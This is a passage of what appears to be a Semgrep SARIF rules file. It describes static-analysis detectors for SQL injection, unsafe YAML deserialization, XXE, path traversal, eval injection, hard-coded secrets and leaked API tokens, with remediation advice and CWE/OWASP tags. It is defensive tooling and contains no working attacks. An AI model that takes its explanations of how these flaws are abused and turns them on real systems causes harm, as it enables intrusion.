detected."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request","id":"typescript.react.security.react-insecure-request.react-insecure-request","name":"typescript.react.security.react-insecure-request.react-insecure-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-insecure-request.react-insecure-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli)\n - [https://www.npmjs.com/package/mysql2](https://www.npmjs.com/package/mysql2)\n - [https://www.npmjs.com/package/mysql](https://www.npmjs.com/package/mysql)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","id":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","name":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","id":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","name":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","id":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","name":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pyyaml.tainted-pyyaml"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open","id":"ruby.lang.security.dangerous-open.dangerous-open","name":"ruby.lang.security.dangerous-open.dangerous-open","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-open.dangerous-open"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","id":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","name":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"help":{"markdown":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","id":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","name":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"help":{"markdown":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","id":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","name":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"help":{"markdown":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\"\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n - [https://nodejs.org/api/tls.html#tls_tls_default_min_version](https://nodejs.org/api/tls.html#tls_tls_default_min_version)\n","text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","id":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","name":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","id":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","name":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","id":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","name":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information."},"help":{"markdown":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string)\n - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html)\n","text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string","id":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","name":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.code.user-eval-format-string.user-eval-format-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls."},"help":{"markdown":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests)\n","text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","id":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","name":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"help":{"markdown":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","id":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","name":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","id":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","name":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"help":{"markdown":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n","text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder","id":"java.lang.security.audit.xml-decoder.xml-decoder","name":"java.lang.security.audit.xml-decoder.xml-decoder","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-decoder.xml-decoder"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Onfido live API Token detected"},"help":{"markdown":"Onfido live API Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token)\n - [https://documentation.onfido.com/api/latest/#api-tokens](https://documentation.onfido.com/api/latest/#api-tokens)\n","text":"Onfido live API Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","id":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","name":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","id":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","name":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use 